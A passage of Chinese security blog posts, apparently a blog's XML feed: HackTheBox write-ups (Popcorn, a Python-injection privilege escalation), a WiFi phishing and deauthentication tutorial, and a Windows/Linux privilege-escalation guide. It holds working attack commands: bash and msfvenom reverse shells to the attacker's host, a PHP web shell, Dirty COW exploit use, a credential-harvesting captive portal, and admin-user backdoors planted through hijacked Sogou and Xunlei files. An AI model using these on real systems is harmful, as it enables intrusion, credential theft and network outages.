bash">vim test.md<br>sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py<br></code></pre></td></tr></table></figure><p>说实话,下面payload里面的这个布尔判断没有弄懂,网上的wp也没有解释为什么。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># Skytrain Inc</span><br><span class="hljs-comment">## Ticket to abc</span><br>__Ticket Code:__<br>**<span class="hljs-number">11</span>+<span class="hljs-number">10</span>==<span class="hljs-number">21</span> <span class="hljs-keyword">and</span> <span class="hljs-built_in">__import__</span>(<span class="hljs-string">'os'</span>).system(<span class="hljs-string">'/bin/bash'</span>) == <span class="hljs-literal">False</span><br></code></pre></td></tr></table></figure><p>提权成功!(P.S.不要忘记切换root目录!)</p><p><img src="https://i.loli.net/2021/11/19/srZuV4nzb2iFKTS.png"></p><p><img src="https://i.loli.net/2021/11/19/ls69vS4TmHuOAFJ.png"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这个靶场其实不仅有一种玩法,例如提权环节执行python脚本,可以在Markdown文件里面写入bash反弹一句话,执行后在本机nc监听,也是可以获取到root权限的。个人认为这个靶场最难的部分在于python代码审计,读懂了才能进行提权操作。最后,放出完结撒花图!</p><p><img src="https://i.loli.net/2021/11/19/vizDc8JneAwtCsb.png"></p>]]></content>
<categories>
<category>打靶笔记</category>
</categories>
<tags>
<tag>HackTheBox</tag>
</tags>
</entry>
<entry>
<title>HackTheBox--Popcorn</title>
<link href="/2021/11/08/HackTheBox-Popcorn/"/>
<url>/2021/11/08/HackTheBox-Popcorn/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这是hack the box退休机器里面的一个中级难度的靶场,需要充VIP才能打。对于我这个菜鸡而言,还是很有些难度的,所以特此写个wp记录一下。</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>nmap先扫一波:</p><figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dns">nmap -Pn -<span class="hljs-keyword">A</span> <span class="hljs-number">10.10.10.6</span><br></code></pre></td></tr></table></figure><p>发现开了web服务和ftp服务,ftp服务没什么用,于是从web服务入手。访问ip地址以后发现只有默认页面,于是dirbuster爆破一下(这里直接选最小的字典就行,字典存放的默认路径是<code>/usr/share/dirbuster/wordlists</code>):</p><p><img src="https://s2.loli.net/2022/09/17/6ZtJpUaWn8qr941.png" alt="img"></p><p>按照下图设置好即可开始爆破。先爆破主目录下面的二级目录:</p><p><img src="https://s2.loli.net/2022/09/17/XHYvrKBJVDaPwnf.png" alt="img"></p><p><img src="https://s2.loli.net/2022/09/17/8FD45tBWCbUhXp9.png" alt="img"></p><p>发现<code>/torrent</code>返回状态码200,说明有戏。</p><h3 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h3><p>访问后发现是一个BT种子的CMS,废话少说,先找上传点。需要登录,这里随便注册个账号(信息随便填):</p><p><img src="https://s2.loli.net/2022/09/17/5N4PrfnF7GimXvY.png" alt="img"></p><p>注册登录后点击<code>upload</code>模块,发现上传文件类型被限制为torrent文件,试了各种绕过也不行。没办法,只能通过三级目录入手:</p><p><img src="https://s2.loli.net/2022/09/17/zmedlSsYtjRrFqw.png" alt="img"></p><p>爆破后发现下面有<code>databases</code>目录,点进去看到SQL文件,审计后发现管理员账号密码(密码需要md5解密):</p><p><img src="https://s2.loli.net/2022/09/17/MTSe6KZG7ujL3ag.png" alt="img"></p><p>好像没什么用(有兴趣的师傅可以研究一下),继续找下一个上传点。找了一圈没有找到,只能自己找一个正常的BT种子上传,我选择去kali官网下载一个种子上传。</p><p>上传种子以后找到一个图片上传点:</p><p><img src="https://s2.loli.net/2022/09/17/OvexbTnMqXZAWCN.png" alt="img"></p><p>下面分享几种getshell的方法:</p><p><strong>0x01 利用msf生成shell</strong></p><p>我们可以利用msf生成一个PHP的木马:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">msfvenom -p php/meterpreter/reverse_tcp <span class="hljs-attribute">lhost</span>=tun0 <span class="hljs-attribute">lport</span>=6666 -f<span class="hljs-built_in"> raw </span>> shell.php<br></code></pre></td></tr></table></figure><p>把文件名改成<code>shell.php.jpg</code>绕过第一层限制,再用burpsuite抓包,改回文件名:</p><p><img src="https://s2.loli.net/2022/09/17/vcWGUiwxHOetDrX.png" alt="img"></p><p>去爆破到的<code>/torrent/upload</code>目录下找到刚才上传的webshell,点进去(注意做了改名处理)再刷新,msf设置好各项参数即可拿到反弹回来的shell。</p><p>上传成功:</p><p><img src="https://s2.loli.net/2022/09/17/JnZG2ImBNje8HuV.png" alt="img"></p><p><strong>0x02 bash一句话,用netcat监听</strong></p><p>同样方式上传一句话木马<code><?php @system($_POST['cmd']);?></code>,bp改后缀,bash连接一句话:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">curl http:<span class="hljs-regexp">//</span><span class="hljs-number">10.10</span>.<span class="hljs-number">10.6</span><span class="hljs-regexp">/木马路径 --data-urlencode "cmd=bash -c 'bash -i >& /</span>dev<span class="hljs-regexp">/tcp/</span>kali内网ip/端口 <span class="hljs-number">0</span>>&<span class="hljs-number">1</span><span class="hljs-string">'"</span><br></code></pre></td></tr></table></figure><p>nc监听反弹的shell。</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">nc</span> -lvnp <span class="hljs-number">6666</span><br></code></pre></td></tr></table></figure><p>建议用python自带的伪终端模块:</p><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">python -c <span class="hljs-symbol">'import</span> pty;pty.spawn(<span class="hljs-string">"/bin/bash"</span>)'<br></code></pre></td></tr></table></figure><p><strong>0x03 github上下载PHP反弹shell</strong></p><p><a href="https://github.com/pentestmonkey/php-reverse-shell">https://github.com/pentestmonkey/php-reverse-shell</a></p><p>拿到www权限后,user.txt就很容易找到了(忘记截图了)。</p><h3 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h3><p>拿到shell后老规矩,先<code>uname -a</code>查看当前系统内核版本,<code>lsbrelease_a</code>查看系统发行版,再上网搜索相关exp,发现有脏牛等几种提权exp。把C语言代码上传到服务器,再编译。上传方式可以是和前面一样,但是文件上传后会重命名,所以我想到以下几种上传exp的方法:</p><p><strong>0x01 把exp传到我的vps,再在弹回来的shell里面使用wget下载</strong></p><p><strong>0x02 使用scp命令上传文件(失败)</strong></p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs elixir">scp root<span class="hljs-variable">@10</span>.<span class="hljs-number">10.14</span>.<span class="hljs-number">3</span><span class="hljs-symbol">:/home/kali/Desktop/tiquan</span>.c /tiquan.c <span class="hljs-comment">#前面的是kali上exp的路径,后面的是靶机路径</span><br></code></pre></td></tr></table></figure><p>这种方法失败了,据说是因为弹回来的shell无法执行scp命令。</p><p>最后在某位大佬的提示下,使用python的http模块:</p><figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs axapta">python3 -m http.<span class="hljs-keyword">server</span> 端口 <span class="hljs-meta">#python3</span><br>python -m SimpleHTTPServer 端口 <span class="hljs-meta">#python2</span><br></code></pre></td></tr></table></figure><p>在靶机使用wget下载:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">wget http:<span class="hljs-regexp">//</span>kali的内网ip:端口/exp.c<br></code></pre></td></tr></table></figure><p>靶机编译并运行:</p><figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs 1c">gcc <span class="hljs-built_in">exp</span>.c -o <span class="hljs-built_in">exp</span> <br>chmod +x <span class="hljs-built_in">exp</span><br>./<span class="hljs-built_in">exp</span><br></code></pre></td></tr></table></figure><p>这里我遇到了报错(换成<a href="https://www.exploit-db.com/exploits/14339">官方wp里面的exp</a>出现权限不足提示):</p><p><img src="https://s2.loli.net/2022/09/17/VBu7rGOCUH8linL.png" alt="img"></p><p>既然这个exp和官方wp里面的exp不行,那么换<a href="https://www.exploit-db.com/exploits/40847">脏牛提权</a>试试:</p><p><a href="https://www.exploit-db.com/exploits/40847">https://www.exploit-db.com/exploits/40847</a></p><p>各种编译错误,失败。</p><p>看了大佬博客以后,发现用了下面的exp才能成功:</p><p><a href="https://www.exploit-db.com/exploits/40839">https://www.exploit-db.com/exploits/40839</a></p><p>这里要注意编译命令,要带上额外的参数:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">gcc -pthread dirty.c -o dirty -lcrypt<br>./dirty<br></code></pre></td></tr></table></figure><p>编译成功后运行超级慢,不知道是为什么。使用exp中的用户名和自己设置的密码,ssh登录后,进入root文件夹即可找到root.txt。(这里一定要用ssh登录,否则部分命令会无法执行)</p><p><img src="https://s2.loli.net/2022/09/17/kWuSgsrtyi73co5.png" alt="img"></p><p>成功拿下!</p><p><img src="https://s2.loli.net/2022/09/17/aLg7HqMO3GrIXuZ.png" alt="img"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这个靶机算是很贴近实战的步骤了,个人认为文件上传部分的过滤有些简单,很容易getshell。虽然没有内网部分,但是外网打点仍然值得回味。尤其是提权部分,是整个过程中耗时最长的,也是遇到问题最多的。这也告诉我们,实战中遇到这些问题不要轻易放弃,而是要坚持下去,不是找到exp就万事大吉了。</p>]]></content>
<categories>
<category>打靶笔记</category>
</categories>
<tags>
<tag>HackTheBox</tag>
</tags>
</entry>
<entry>
<title>Kali渗透(三)--WiFi钓鱼和断网攻击</title>
<link href="/2021/10/31/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%89%EF%BC%89-WiFi%E9%92%93%E9%B1%BC%E5%92%8C%E6%96%AD%E7%BD%91%E6%94%BB%E5%87%BB/"/>
<url>/2021/10/31/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%89%EF%BC%89-WiFi%E9%92%93%E9%B1%BC%E5%92%8C%E6%96%AD%E7%BD%91%E6%94%BB%E5%87%BB/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近翻看去年买的近源渗透有关的书籍,看到书中有关于WiFi钓鱼的部分,于是突然来了兴趣,在某淘宝店铺购买了两块无线网卡(一块只支持2.4G频段,另一块同时支持2.4G和5G频段),进行WiFi钓鱼。</p><p>不得非法入侵他人设备,遵纪守法,天网恢恢疏而不漏。</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><p>由于我购买的网卡会附赠配好环境的kali虚拟机,所以这里不作讲解。</p><p>这里我会列出几种钓鱼的方法,分为钓鱼获取WiFi密码和获取个人信息两种情况。</p><h3 id="钓鱼获取WiFi密码"><a href="#钓鱼获取WiFi密码" class="headerlink" title="钓鱼获取WiFi密码"></a>钓鱼获取WiFi密码</h3><p>由于时间有限,没来得及截图,在这里表示抱歉!</p><p>这里使用kali虚拟机,网络连接设置为桥接模式,我的eth0地址是192.168.50.189(每个人的都不一样)。</p><p>这里我们使用airgeddon这个shell脚本,在极客之眼的官网可以下载到这个脚本。运行刚开始会检查依赖环境是否缺失,检查完成后选择外接的无线网卡:</p><p><img src="https://s2.loli.net/2022/09/16/Zol9AECnW6HMaLR.png" alt="image-20220916211255839"></p><p>先把网卡设置为监听模式:</p><p><img src="https://s2.loli.net/2022/09/16/asdeoq84vZNOjE1.png" alt="image-20220916211518304.png"></p><p>选择“下一步”之后,顺便抓个握手包:</p><p><img src="https://s2.loli.net/2022/09/16/e3VuoitJDaENBfl.png" alt="image-20220916212218174"></p><p><img src="https://s2.loli.net/2022/09/16/FmWwhdZH6akl4yK.png" alt="image-20220916212246282"></p><p>连按两次“下一步”以后,开始扫描附近的WiFi。扫描到目标WiFi以后按Ctrl+C暂停,再输入目标WiFi的编号:</p><p><img src="https://s2.loli.net/2022/09/16/IrAoHnvE2SWgCwG.png" alt="image-20220916212511774"></p><p>选择断网攻击模式:</p><p><img src="https://s2.loli.net/2022/09/16/4uznilxSWCN5ctd.png" alt="image-20220916212632442"></p><p>连按三次“n”后,输入抓包时间(范围是10-100秒)后回车,此时屏幕上会出现几个黑色窗口:</p><p><img src="https://s2.loli.net/2022/09/16/eqUCJrvdhKXAfzR.png" alt="image-20220916212820103"></p><p>抓到握手包后,脚本会提示握手包的保存位置以及钓鱼获取到密码的保存位置:</p><p><img src="https://s2.loli.net/2022/09/16/zpwXQtoK87dFP6E.png" alt="image-20220916213017408"></p><p>一直回车后,选择钓鱼页面的语言(由于脚本是老外写的,所以没有中文版钓鱼页面):</p><p><img src="https://s2.loli.net/2022/09/16/9TfKVD2SqlZdRn7.png" alt="image-20220916213209555"></p><p>回车后再次弹出几个黑框:</p><p><img src="https://s2.loli.net/2022/09/16/xpnbedrYCmW6AF8.png" alt="image-20220916213442408"></p><p>与此同时,目标WiFi正在被断网攻击,所以原来连接目标WiFi的设备会连不上目标WiFi,只能转而连接我们的钓鱼WiFi,并在弹出的钓鱼页面中输入WiFi密码:</p><p><img src="https://s2.loli.net/2022/09/16/V4Te61hRW9vMJso.jpg"></p><p>如果钓到的WiFi密码和握手包里的匹配,则WiFi密码会显示在箭头所指的地方:</p><p><img src="https://s2.loli.net/2022/09/16/Vq1fbZATmkhI4c8.png" alt="image-20220916220444006"></p><p>当然,你也可以不选择钓鱼,直接去爆破前面抓到的pcap结尾的握手包,就是比较看运气。</p><h3 id="钓鱼获取个人信息"><a href="#钓鱼获取个人信息" class="headerlink" title="钓鱼获取个人信息"></a>钓鱼获取个人信息</h3><p>这个不仅可以钓到个人信息,而且也可以钓到WiFi密码。与上一种方法相比,这种方法支持自定义钓鱼页面,可玩性更高。</p><p>这里我使用的是<a href="https://github.com/hacefresko/EvilPortal.git">EvilPortal</a>这个工具,可以在github下载到。进入到文件夹并执行<code>python3 run.py</code>,选择第一个选项:</p><p><img src="https://s2.loli.net/2022/09/16/o9ramA86gzTCMZ5.png" alt="image-20220916221504561"></p><p>WiFi SSID随便取一个,这里我以FreeWifi为例,信道也随便选一个,安全性选“open”,回车即可启动:</p><p><img src="https://s2.loli.net/2022/09/16/oaherRkPXNjTCYf.png" alt="image-20220916221817635"></p><p>当其它设备连接上这个WiFi时,就会跳转到提前设置好的钓鱼页面了。怎么设置钓鱼环境呢?</p><p>首先我们先配置好MySQL环境:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs sql">$ service mysql <span class="hljs-keyword">start</span><br>$ mysql<br>MariaDB [(<span class="hljs-keyword">none</span>)]<span class="hljs-operator">></span> <span class="hljs-keyword">create</span> database fakeap;<br>MariaDB [(<span class="hljs-keyword">none</span>)]<span class="hljs-operator">></span> <span class="hljs-keyword">create</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">user</span>;<br>MariaDB [(<span class="hljs-keyword">none</span>)]<span class="hljs-operator">></span> <span class="hljs-keyword">grant</span> <span class="hljs-keyword">all</span> <span class="hljs-keyword">on</span> fakeap.<span class="hljs-operator">*</span> <span class="hljs-keyword">to</span> <span class="hljs-string">'user'</span>@<span class="hljs-string">'localhost'</span> identified <span class="hljs-keyword">by</span> <span class="hljs-string">'password'</span>;<br>MariaDB [(<span class="hljs-keyword">none</span>)]<span class="hljs-operator">></span> use fakeap<br>MariaDB [fakeap]<span class="hljs-operator">></span> <span class="hljs-keyword">create</span> <span class="hljs-keyword">table</span> accounts(email <span class="hljs-type">varchar</span>(<span class="hljs-number">30</span>), password <span class="hljs-type">varchar</span>(<span class="hljs-number">30</span>));<br>MariaDB [fakeap]<span class="hljs-operator">></span> <span class="hljs-keyword">alter</span> database fakeap <span class="hljs-type">character</span> <span class="hljs-keyword">set</span> <span class="hljs-string">'utf8'</span>;<br>MariaDB [fakeap]<span class="hljs-operator">></span> <span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> accounts;<br></code></pre></td></tr></table></figure><p>配置好数据库环境后,进入<code>/var/www/html/captive</code>目录,这是存放钓鱼页面的目录,把我们的钓鱼页面按照原有的<code>db.php</code>修改后启动脚本,这时kali的MySQL服务和Apache服务就会启动,钓到的用户名密码就会存入数据库。利用这个方法,我们可以钓到其他同学的校园网账号和密码(bushi)。</p><h3 id="断网攻击"><a href="#断网攻击" class="headerlink" title="断网攻击"></a>断网攻击</h3><p>DoS断网攻击可以利用的脚本太多了,这里我以其中三个脚本为例。</p><p>插上网卡后先用<code>lsusb</code>命令检查网卡是否正常插入。</p><h4 id="airgeddon"><a href="#airgeddon" class="headerlink" title="airgeddon"></a>airgeddon</h4><p>还是前面的那个脚本,把网卡设置为监听模式以后选择“4”即可。实际使用过程中发现不太好使,不推荐用这个脚本断网攻击。</p><h4 id="sparrow-wifi"><a href="#sparrow-wifi" class="headerlink" title="sparrow-wifi"></a>sparrow-wifi</h4><p>这是一个Python开发的GUI工具,使用起来也很简单。进入文件夹后,运行命令<code>python3 sparrow-wifi.py</code>,就会弹出一个图形化界面。选择“Falcon”-“Advanced Scan”,并启用监听模式:</p><p><img src="https://s2.loli.net/2022/09/16/4dr9SzLFyfhMuEW.png" alt="image-20220916223343208"></p><p><img src="https://s2.loli.net/2022/09/16/x9IMsriqH5NdWe8.png" alt="image-20220916223427101"></p><p>点击“start”开始扫描,扫到目标WiFi后点击“Stop scanning”,并在下面列表中的目标WiFi上右键选择箭头所指的选项(下面那个是抓WPA握手包):</p><p><img src="https://s2.loli.net/2022/09/16/ScRB1odiXzU9L72.png" alt="image-20220916223653515"></p><p>弹出的对话框选择“yes”即可开始攻击,要想停止攻击只需在目标WiFi上右键“Stop deauth”即可:</p><p><img src="https://s2.loli.net/2022/09/16/C9UzlmMI81k7AEF.png" alt="image-20220916223945748"></p><h4 id="wifidos"><a href="#wifidos" class="headerlink" title="wifidos"></a>wifidos</h4><p>这个脚本使用起来更简单,也是用Python开发的,只有CUI。选择无线网卡和目标WiFi后,即可开始攻击:</p><p><img src="https://s2.loli.net/2022/09/16/WwVjg6kANH325eQ.png" alt="image-20220916224315125"></p><p>连按两下Ctrl+C停止攻击。想要这个脚本的,评论区留言或者给我发email即可。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>本次教程到此结束,最后还是要提醒大家不要做出违法的事情,谢谢!</p>]]></content>
<categories>
<category>无线安全</category>
</categories>
<tags>
<tag>kali渗透</tag>
</tags>
</entry>
<entry>
<title>Windows和Linux系统提权</title>
<link href="/2021/10/29/Windows%E5%92%8CLinux%E7%B3%BB%E7%BB%9F%E6%8F%90%E6%9D%83/"/>
<url>/2021/10/29/Windows%E5%92%8CLinux%E7%B3%BB%E7%BB%9F%E6%8F%90%E6%9D%83/</url>
<content type="html"><![CDATA[<h2 id="Windows提权"><a href="#Windows提权" class="headerlink" title="Windows提权"></a>Windows提权</h2><h3 id="内核补丁提权"><a href="#内核补丁提权" class="headerlink" title="内核补丁提权"></a>内核补丁提权</h3><p>在目标机执行<code>systeminfo</code>命令,再把得到的信息复制粘贴到以下网站。</p><p>提权辅助网站:<a href="http://bugs.hacking8.com/tiquan/">http://bugs.hacking8.com/tiquan/</a></p><h3 id="数据库提权"><a href="#数据库提权" class="headerlink" title="数据库提权"></a>数据库提权</h3><p>由于篇幅太长,所以单独写了一篇文章。具体方法,可参考本人的另一篇文章。</p><h3 id="计划任务提权"><a href="#计划任务提权" class="headerlink" title="计划任务提权"></a>计划任务提权</h3><p>Windows自带的计划任务分为<code>at</code>和<code>schtasks</code>两种。</p><p><strong>AT提权</strong>:适用于win7以下的逻辑性利用,创造新的指定文件时间允许,将获取system权限</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">at <span class="hljs-number">20</span>:<span class="hljs-number">55</span> /interactive cmd.exe<br></code></pre></td></tr></table></figure><p><strong>SC反弹–创建服务</strong>:绑定执行文件cmd,执行弹出system提权</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">sc</span> Create syscmd binPath= <span class="hljs-string">"cmd /K start"</span> <span class="hljs-built_in">type</span>= own <span class="hljs-built_in">type</span>= interact<br><span class="hljs-built_in">sc</span> <span class="hljs-built_in">start</span> syscmd<br></code></pre></td></tr></table></figure><p><strong>PS提权(仅win2008):</strong>需要win安装pstools/ps插件,允许即可</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">psexec.exe <span class="hljs-literal">-accepteula</span> <span class="hljs-literal">-s</span> <span class="hljs-literal">-i</span> <span class="hljs-literal">-d</span> notepad.exe<br></code></pre></td></tr></table></figure><h3 id="DLL劫持提权"><a href="#DLL劫持提权" class="headerlink" title="DLL劫持提权"></a>DLL劫持提权</h3><p>Windows程序启动的时候需要dll(动态链接库)。如果这些dll不存在,则可以通过在应用程序要查找的位置放置恶意dll来提权。通常,Windows应用程序有其预定义好的搜索dll的路径,它会根据下面的顺序进行搜索:</p><p>1.应用程序加载的目录</p><p>2.C:\Windows\System32 </p><p>3.C:\Windows\System </p><p>4.C:\Windows </p><p>5.当前工作目录Current Working Directory,CWD </p><p>6.在PATH环境变量的目录(先系统后用户)</p><p>这样的加载顺序很容易导致一个系统dll被劫持,因为只要攻击者将目标文件和恶意dll放在一起即可,导致恶意dll先于系统dll加载,而系统dll是非常常见的,所以当时基于这样的加载顺序,出现了大量受影响软件。</p><h4 id="lpk-dll提权"><a href="#lpk-dll提权" class="headerlink" title="lpk.dll提权"></a>lpk.dll提权</h4><p>系统本身的lpk.dll文件位于C:\WINDOWS\system32和C:WINDOWS\system\dllcache目录下。lpk.dll病毒的典型特征是感染存在可执行文件的目录,并隐藏自身,删除后又再生成,当同目录中的exe文件运行时,lpk.dll就会被Windows动态链接,从而激活病毒,进而导致不能彻底清除。</p><p>这里我们使用t00ls论坛编写的dll提权小工具–T00ls Lpk Sethc v4(使用时务必关掉杀软)。不过使用前提是对方服务器开启了远程桌面功能(不一定是3389端口,这时可以用<code>tasklist /svc</code>命令查看pid,再用<code>netstat -ano</code>命令查找对应端口)。</p><p>在拿到webshell的前提下,将lpk.dll上传到目标服务器带有exe的目录下,当exe被执行后,就会动态链接lpk.dll。当用户重启机器时,lpk.dll会劫持远程连接。这时我们只需连按5次shift键启用后门,并同时按住Ctrl键和设定的两个热键,就会弹出密码框。接下来的操作就很容易了,图形化界面有手就行。</p><h3 id="第三方软件提权"><a href="#第三方软件提权" class="headerlink" title="第三方软件提权"></a>第三方软件提权</h3><p>第三方软件提权,就是利用第三方软件存在的漏洞来进行获取一个权限的操作。</p><h4 id="搜狗输入法提权"><a href="#搜狗输入法提权" class="headerlink" title="搜狗输入法提权"></a>搜狗输入法提权</h4><p>由于搜狗输入法默认设置是自动更新(很少有人去更改这个设置),更新程序没有对exe做任何校验直接在输入法升级时调用运行,而且搜狗输入法为了方便更新,所在文件夹默认读写、执行权限全开,导致我们可以上传bat脚本编译后的恶意exe程序,替换原有的更新程序,进行提权操作。</p><p>在获取webshell的前提下,在某个盘下找到了搜狗的路径:x:\Program Files\SogouInput。</p><p>编写以下批处理脚本(这里以创建用户并添加管理员组为例):</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">@<span class="hljs-built_in">echo</span> off<br>@net user hack hack123 /add<br>@net localgroup administrators hack /add<br></code></pre></td></tr></table></figure><p>用Quick Batch File Compiler编译为exe程序,上传我们的PinyinUp.exe文件,把之前搜狗路径下的PinyinUp文件改个名字。当服务器管理员更新词库的时候就会调用我们的PinyinUp.exe程序,然后执行我们之前写的bat脚本中的命令,即添加hack用户到管理员组。</p><h4 id="迅雷提权"><a href="#迅雷提权" class="headerlink" title="迅雷提权"></a>迅雷提权</h4><p>我们每次在网页中使用迅雷下载文件时,迅雷都会自动调用安装目录中的geturl.htm和getAllurl.htm文件来获取下载链接、bt种子等资源。我们可以利用这一特性,更改迅雷安装目录下的这两个文件。而且迅雷安装目录的所有权限全开,也给我们提权提供了便利。同样的,需要通过webshell找到迅雷安装目录。</p><p>在其中任意一个文件结尾加上这段vbs脚本代码:</p><figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs vbscript"><script language=<span class="hljs-string">"VBScript"</span>><br><span class="hljs-keyword">Set</span> vbs=<span class="hljs-built_in">CreateObject</span>(<span class="hljs-string">"Wscript.Shell"</span>)<br>vbs.run <span class="hljs-string">"cmd /c 要执行的命令"</span>,<span class="hljs-number">0</span><br></script><br></code></pre></td></tr></table></figure><p>当服务器管理员使用迅雷下载文件时,VBScript脚本里面的命令便会执行,提权操作顺利完成。</p><h2 id="Linux提权"><a href="#Linux提权" class="headerlink" title="Linux提权"></a>Linux提权</h2><p>Linux提权相对于windows来说方法比较单一,主要提权方式为suid提权,内核提权,环境变量提权,计划任务提权,第三方服务提权,今天来记载一下关于suid提权以及内核提权,以及对目标linux信息收集的判断,以及漏洞探针。</p><h3 id="内核提权"><a href="#内核提权" class="headerlink" title="内核提权"></a>内核提权</h3><p>在进行Linux内核提权之前,我们一般先查看内核版本:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">uname</span> -a<br>lsb_release -a<br></code></pre></td></tr></table></figure><p>通过内核版本找到对应exp后,在拿到webshell的前提下反弹shell:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -lvvp 监听端口<br>python -c <span class="hljs-string">"import pty;pty.spawn('/bin/bash')"</span> <span class="hljs-comment">#如果看着不顺眼可以用这句命令改为交互式界面</span><br></code></pre></td></tr></table></figure><p>在Linux系统内进行编译并赋权:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">gcc exp.c -o exp<br><span class="hljs-built_in">chmod</span> +x exp<br></code></pre></td></tr></table></figure><p>运行exp:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">./exp<br></code></pre></td></tr></table></figure><p>验证提权是否成功:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">whoami</span><br></code></pre></td></tr></table></figure><p>如果返回结果是root,则提权成功。无论哪个Linux发行版都是如此。</p><p>但是手工信息收集效率不高,这里推荐两款信息收集与漏洞探针的自动化脚本,<br>信息收集:LinEnum.sh<br>漏洞探针:linux-exploit-suggster2</p><h3 id="suid提权"><a href="#suid提权" class="headerlink" title="suid提权"></a>suid提权</h3><p>首先了解suid与guid概念,所谓suid就是使用具有suid的文件时候,将可以赋予suid权限命令的用户一样的权限去运行这个文件,好比root给a文件赋予suid,当我们以普通权限user去运行a,也将以root权限运行该文件。guid的概念就是将suid里面user用户的权限更改为group组的。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 手工赋予suid权限:</span><br><span class="hljs-built_in">chmod</span> u+s xxx<br><span class="hljs-comment"># 手工删除suid权限:</span><br>suid u-s xxx<br><span class="hljs-comment"># 手工搜寻本机suid的命令:</span><br>find / -user root -perm -4000 -<span class="hljs-built_in">print</span> 2>/dev/null<br>find / -perm -u=s -<span class="hljs-built_in">type</span> f 2>/dev/null<br>find / -user root -perm -4000 -<span class="hljs-built_in">exec</span> <span class="hljs-built_in">ls</span> -ldb {} ;<br><span class="hljs-comment"># 搜寻guid命令:</span><br>find / -perm -g=s -<span class="hljs-built_in">type</span> f 2>/dev/null<br><br><span class="hljs-comment"># suid提权就是使用具有suid的命令去执行其他命令,因为具有suid的命令具备root权限,从而实现突破普通权限,获取root权限去执行命令</span><br><span class="hljs-comment"># 